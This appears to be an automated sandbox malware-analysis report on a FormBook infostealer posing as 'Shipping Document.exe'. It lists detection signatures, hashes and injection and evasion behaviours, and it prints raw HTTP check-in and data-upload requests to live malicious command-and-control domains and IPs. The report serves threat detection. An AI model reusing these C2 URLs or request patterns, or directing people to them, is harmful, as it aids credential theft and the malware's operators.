Windows Analysis Report
Shipping Document.exe

Overview

General Information

Sample name: Shipping Document.exe
Analysis ID: 1447908
MD5: d6e393603c46c4152ea7603ff047af86
SHA1: 664cfe9fa1b0df9d616d4158bb0b5742e62a1756
SHA256: a70008d95ba3e813cd35c1c663aa46c3cf6c95eeaeccbfbdeb18597daec36647
Tags: exeFormbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

barindex
Source: http://www.auronhouse.com/opfh/ Avira URL Cloud: Label: malware
Source: http://www.drapples.club/opfh/ Avira URL Cloud: Label: phishing
Source: http://www.auronhouse.com/opfh/?R40L6=7Wua4PKYKhchrV0dSktA0JoUSva1JJLdwMIZklFmHGZRtcxczCNUWysLgxYx/pnfXqYHMYy3waVzlkYFJZPX15RsNLA3Qz23CQiAilW87ptstt/8e1muReOX5esxW5+HpDKanOvxLVS9&b2PX=hZXl7VFPKl04 Avira URL Cloud: Label: malware
Source: http://www.ukscan.co.uk/opfh/?R40L6=psz/lQNJHky0FOXgYDlRBO31u/UTIg5Z7J5/vGqoP1XE+s8tr2C67qXiCqgsbd7PhBjn/lOTwSnvTpIgb8gb5UyiwGIV81pY4xefKgdN39cek8LArgSLQN3X1wfTB8wzGIcdBGhl9zAd&b2PX=hZXl7VFPKl04 Avira URL Cloud: Label: malware
Source: http://www.ukscan.co.uk/opfh/ Avira URL Cloud: Label: malware
Source: http://www.pricekaboom.com/opfh/ Avira URL Cloud: Label: malware
Source: http://www.pricekaboom.com/opfh/?R40L6=i+7S41wOBsHRtkSR5z49LNLl1g14jCJSsH67VhPHZINUfWrbgsYvxB6MwE8qgxdKQETWoz01bCGz4LwvUs/3BJoUBrhuAwUbkATTebp7Ts+JQM1y8oWpV0wDLMDnSIORGtRyV6PjEdP1&b2PX=hZXl7VFPKl04 Avira URL Cloud: Label: malware
Source: https://www.auronhouse.com/opfh/?R40L6=7Wua4PKYKhchrV0dSktA0JoUSva1JJLdwMIZklFmHGZRtcxczCNUWysLgxYx/ Avira URL Cloud: Label: malware
Source: http://www.batchscraper.com/opfh/?R40L6=AGl44rzTw2dIC+2fJHSMY5CagqpMx9ss+xDw2ILHnY0V4XytCPUwKd/QF5kiL9X2gIgUWxZ6E+yGLjvXAstM4MAyIKs/O1HO2djzFZ+svgnMXhmr1Gwb4CXwLPvvhByMEXNfrkehm32q&b2PX=hZXl7VFPKl04 Avira URL Cloud: Label: malware
Source: http://www.annahaywardva.co.uk/opfh/?R40L6=rBeI5JL4SdE8nFW9pIUfBkvOLwnHMU9O9JCyLdspFwofGsVtAi0tgWeg3zHJ2XnwxoW6lgl8FdELwhlchXf8iZDZl79NZT9hgeyhr+mr8upFSzDJKwHDStxLaliRPfjpA6FezmrpjIYZ&b2PX=hZXl7VFPKl04 Avira URL Cloud: Label: malware
Source: http://www.annahaywardva.co.uk/opfh/ Avira URL Cloud: Label: malware
Source: http://www.drapples.club/opfh/?R40L6=ItiWO1iWeFtHa8hPek+OcHyLbef7ZgLT8jCYd//+XcZZdI8PxrJa9smp+DWZYnBxcEEGiLIUcWsNzCqVKSWt292FhOiPAibVi2DXZfZ1Bcb5xD1zZxmn+AopE2U6Sy6WzAqAlkUlqKwq&b2PX=hZXl7VFPKl04 Avira URL Cloud: Label: phishing
Source: www.auronhouse.com Virustotal: Detection: 8% Perma Link
Source: http://www.auronhouse.com/opfh/ Virustotal: Detection: 11% Perma Link
Source: Shipping Document.exe ReversingLabs: Detection: 54%
Source: Shipping Document.exe Virustotal: Detection: 36% Perma Link
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.3984304736.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1669970223.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3980970277.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1670104693.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3987001681.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3977610628.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3984522245.0000000005800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1670907930.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: Shipping Document.exe Joe Sandbox ML: detected
Source: Shipping Document.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: certreq.pdb source: svchost.exe, 00000002.00000003.1621959172.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1621830012.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000003.1591967021.00000000012BB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000002.3978300136.000000000010E000.00000002.00000001.01000000.00000004.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3978327377.000000000010E000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP source: Shipping Document.exe, 00000001.00000003.1511356261.0000000003CC0000.00000004.00001000.00020000.00000000.sdmp, Shipping Document.exe, 00000001.00000003.1507043382.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1670469944.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1670469944.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1558086826.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1555960380.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3984920272.00000000056AE000.00000040.00001000.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3984920272.0000000005510000.00000040.00001000.00020000.00000000.sdmp, certreq.exe, 00000004.00000003.1669727415.00000000051BA000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000003.1674793663.0000000005361000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Shipping Document.exe, 00000001.00000003.1511356261.0000000003CC0000.00000004.00001000.00020000.00000000.sdmp, Shipping Document.exe, 00000001.00000003.1507043382.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1670469944.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1670469944.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1558086826.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1555960380.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, certreq.exe, 00000004.00000002.3984920272.00000000056AE000.00000040.00001000.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3984920272.0000000005510000.00000040.00001000.00020000.00000000.sdmp, certreq.exe, 00000004.00000003.1669727415.00000000051BA000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000003.1674793663.0000000005361000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: certreq.exe, 00000004.00000002.3981081238.0000000003471000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3986547187.0000000005B3C000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1970178698.000000001694C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: certreq.exe, 00000004.00000002.3981081238.0000000003471000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3986547187.0000000005B3C000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1970178698.000000001694C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: certreq.pdbGCTL source: svchost.exe, 00000002.00000003.1621959172.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1621830012.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000003.1591967021.00000000012BB000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_01024696 GetFileAttributesW,FindFirstFileW,FindClose, 1_2_01024696
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_0102C93C FindFirstFileW,FindClose, 1_2_0102C93C
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_0102C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 1_2_0102C9C7
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_0102F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_0102F35D
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_0102F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_0102F200
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_0102F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_0102F65E
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_01023A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_01023A2B
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_01023D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_01023D4E
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_0102BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_0102BF27
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4_2_02F3B8A0 FindFirstFileW,FindNextFileW,FindClose, 4_2_02F3B8A0
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4x nop then xor eax, eax 4_2_02F29330
Source: C:\Windows\SysWOW64\certreq.exe Code function: 4x nop then pop edi 4_2_02F2DB25

Networking

barindex
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63160 -> 172.67.190.203:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63164 -> 142.250.186.51:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63169 -> 3.33.130.190:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63173 -> 199.59.243.225:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63177 -> 212.227.172.253:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63181 -> 199.59.243.225:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63185 -> 213.171.195.105:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63189 -> 203.161.43.227:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63193 -> 160.251.148.118:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63197 -> 199.59.243.225:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63201 -> 185.31.240.240:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63205 -> 199.59.243.225:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63209 -> 3.33.130.190:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63213 -> 91.195.240.92:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:63217 -> 38.47.207.149:80
Source: DNS query: www.ziontool.xyz
Source: DNS query: www.autonomyai.xyz
Source: Joe Sandbox View IP Address: 185.31.240.240 185.31.240.240
Source: Joe Sandbox View IP Address: 203.161.43.227 203.161.43.227
Source: Joe Sandbox View ASN Name: SEDO-ASDE SEDO-ASDE
Source: Joe Sandbox View ASN Name: ZONEZoneMediaOUEE ZONEZoneMediaOUEE
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
Source: Joe Sandbox View ASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 1_2_010325E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 1_2_010325E2
Source: global traffic HTTP traffic detected: GET /opfh/?R40L6=AGl44rzTw2dIC+2fJHSMY5CagqpMx9ss+xDw2ILHnY0V4XytCPUwKd/QF5kiL9X2gIgUWxZ6E+yGLjvXAstM4MAyIKs/O1HO2djzFZ+svgnMXhmr1Gwb4CXwLPvvhByMEXNfrkehm32q&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.batchscraper.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic HTTP traffic detected: GET /opfh/?R40L6=7Wua4PKYKhchrV0dSktA0JoUSva1JJLdwMIZklFmHGZRtcxczCNUWysLgxYx/pnfXqYHMYy3waVzlkYFJZPX15RsNLA3Qz23CQiAilW87ptstt/8e1muReOX5esxW5+HpDKanOvxLVS9&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.auronhouse.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic HTTP traffic detected: GET /opfh/?R40L6=psz/lQNJHky0FOXgYDlRBO31u/UTIg5Z7J5/vGqoP1XE+s8tr2C67qXiCqgsbd7PhBjn/lOTwSnvTpIgb8gb5UyiwGIV81pY4xefKgdN39cek8LArgSLQN3X1wfTB8wzGIcdBGhl9zAd&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.ukscan.co.ukConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic HTTP traffic detected: GET /opfh/?R40L6=ZzDSVGEFmA6bbFgWUPABJOqYyGy556P6SvdRpmz0pldrPkLsuzUuLHkKP8ebqy61OUsJ3I6Wp1cSjumXpsr68z/GSQBLa7X+Wj1CzMiNU/mDF53obi6xM6x1cOBV2RrPtvioQYdy1WMq&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.swordshoop.caConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic HTTP traffic detected: GET /opfh/?R40L6=gmtcV0/XP16HFJIc+kOspKC5zFAVyKp1GVqpqKlYYBexGLFCqPGdfyxYaar+lftgkYb5tsdy9JRJ3lwsUywzZFsvuukx19EGSpFqL58eVbDWPjA2ZTqEF6w8W0EPQt4fJd0o3pJS2XVx&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.fruitique.co.ukConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic HTTP traffic detected: GET /opfh/?R40L6=PC685LTb06jHOCK4vGHbFQZ2xkI1XLFU2OtxALHCeHx3vCzda7v1dhtYxdz770kbIy0AX5udiNTwR8fzRWvU0kdzv6lB2tOiWMAiJN+HcPhB483U4R/s/Re5ANHairphm1/7Mj/vaUsb&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.gamemaster.atConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic HTTP traffic detected: GET /opfh/?R40L6=rBeI5JL4SdE8nFW9pIUfBkvOLwnHMU9O9JCyLdspFwofGsVtAi0tgWeg3zHJ2XnwxoW6lgl8FdELwhlchXf8iZDZl79NZT9hgeyhr+mr8upFSzDJKwHDStxLaliRPfjpA6FezmrpjIYZ&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.annahaywardva.co.ukConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic HTTP traffic detected: GET /opfh/?R40L6=YUsgxJYlBZRF0No39lc3JbqbmV5Q7LZCTky4dVHopuN0Ho35s4wXwSWKkFKDUjWggieTnElUH3EcFS8A7QGjP8jAu/34q2WYLtH3kt2+sJ07P+s7RD70L6colfRzV4eR9N3BYmYWcCpx&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.ziontool.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic HTTP traffic detected: GET /opfh/?R40L6=wk5WmycUod9Ch4sGNMfw6PGGK537NvyqKve97Rqxx64bZj5Y6/ZXBsSfuT6LL9ibplMzreLTp4ANFGROZWA3htlR8tjUt25lxV/kg4OrCh2epctFiYjQQV8YBu8QEUXGE65qscSGJJfb&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.busypro.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic HTTP traffic detected: GET /opfh/?R40L6=i4up9kvrIhZylhTl+TGF8NSB39il2c4qnhHhVcZTirCO4e+BACowf4KjePAiAuddepejX0cVJHKGxf87gLVZ3yhxJ+t5gkh7Sx8ygwwh5CFsGAn8/fc7zcPpOBOJ0Z4qUeJ8jZdFyiV9&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.performacetoyota.caConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic HTTP traffic detected: GET /opfh/?R40L6=i+7S41wOBsHRtkSR5z49LNLl1g14jCJSsH67VhPHZINUfWrbgsYvxB6MwE8qgxdKQETWoz01bCGz4LwvUs/3BJoUBrhuAwUbkATTebp7Ts+JQM1y8oWpV0wDLMDnSIORGtRyV6PjEdP1&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.pricekaboom.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic HTTP traffic detected: GET /opfh/?R40L6=ItiWO1iWeFtHa8hPek+OcHyLbef7ZgLT8jCYd//+XcZZdI8PxrJa9smp+DWZYnBxcEEGiLIUcWsNzCqVKSWt292FhOiPAibVi2DXZfZ1Bcb5xD1zZxmn+AopE2U6Sy6WzAqAlkUlqKwq&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.drapples.clubConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic HTTP traffic detected: GET /opfh/?R40L6=+hpa9HKLtxeYEKNNXPI5VBSfdFDUoaiCusvmIOnHC/L+zjqEV17vBkaVEMb7DgIovUP6hhFd7FyMm1q4LBIs3FeHHcdJlscr/I16R146dIQqVis5Y3/utpIuSORveCYceuc/vKNgK8Bg&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.autonomyai.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic HTTP traffic detected: GET /opfh/?R40L6=FpNucvzIjWOmZMmiXb56c6bY69+Kb+n3d8h+TlHEUGgG180M1/D8mOTG6mRn1YM4wyonPK4hNo3l6hpm9fEjrGx3GgV25NLdT3AKPeddSoL4M+kWNe1Dr4885y6woZHnwBfR8wPvVVyX&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.pharmacielorraine.frConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic HTTP traffic detected: GET /opfh/?R40L6=+MQIh7XosrcV1YUvfmXLRZp9qVlVCaTixn9Z4SHGNrQWXqYuOwa/VK9HsnlVTmeIhuhJsBbQG3swuyVkvGLKXJd4NOCZwBpwFucJm+lE/1jiLpvFuFHXohi2H4hODzVegRzQFrQhMICC&b2PX=hZXl7VFPKl04 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.y94hr.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Source: global traffic DNS traffic detected: DNS query: www.batchscraper.com
Source: global traffic DNS traffic detected: DNS query: www.auronhouse.com
Source: global traffic DNS traffic detected: DNS query: www.ukscan.co.uk
Source: global traffic DNS traffic detected: DNS query: www.swordshoop.ca
Source: global traffic DNS traffic detected: DNS query: www.fruitique.co.uk
Source: global traffic DNS traffic detected: DNS query: www.gamemaster.at
Source: global traffic DNS traffic detected: DNS query: www.annahaywardva.co.uk
Source: global traffic DNS traffic detected: DNS query: www.ziontool.xyz
Source: global traffic DNS traffic detected: DNS query: www.busypro.net
Source: global traffic DNS traffic detected: DNS query: www.performacetoyota.ca
Source: global traffic DNS traffic detected: DNS query: www.digishieldu.online
Source: global traffic DNS traffic detected: DNS query: www.pricekaboom.com
Source: global traffic DNS traffic detected: DNS query: www.drapples.club
Source: global traffic DNS traffic detected: DNS query: www.autonomyai.xyz
Source: global traffic DNS traffic detected: DNS query: www.pharmacielorraine.fr
Source: global traffic DNS traffic detected: DNS query: www.y94hr.top
Source: unknown HTTP traffic detected: POST /opfh/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateHost: www.auronhouse.comOrigin: http://www.auronhouse.comReferer: http://www.auronhouse.com/opfh/Cache-Control: max-age=0Content-Length: 218Content-Type: application/x-www-form-urlencodedConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0Data Raw: 52 34 30 4c 36 3d 32 55 47 36 37 37 75 49 44 47 46 59 71 58 45 30 64 6d 35 39 2b 4c 45 42 64 72 43 6c 41 5a 4c 5a 39 35 56 52 69 30 55 68 4f 46 42 43 7a 76 6c 35 70 53 56 58 49 51 4a 2b 76 44 55 4d 32 4c 62 7a 61 5a 4d 64 44 66 4b 46 2f 4f 4a 38 6c 33 5a 69 55 49 66 56 31 6f 73 73 54 37 49 61 48 78 4f 4c 51 31 6d 57 6b 78 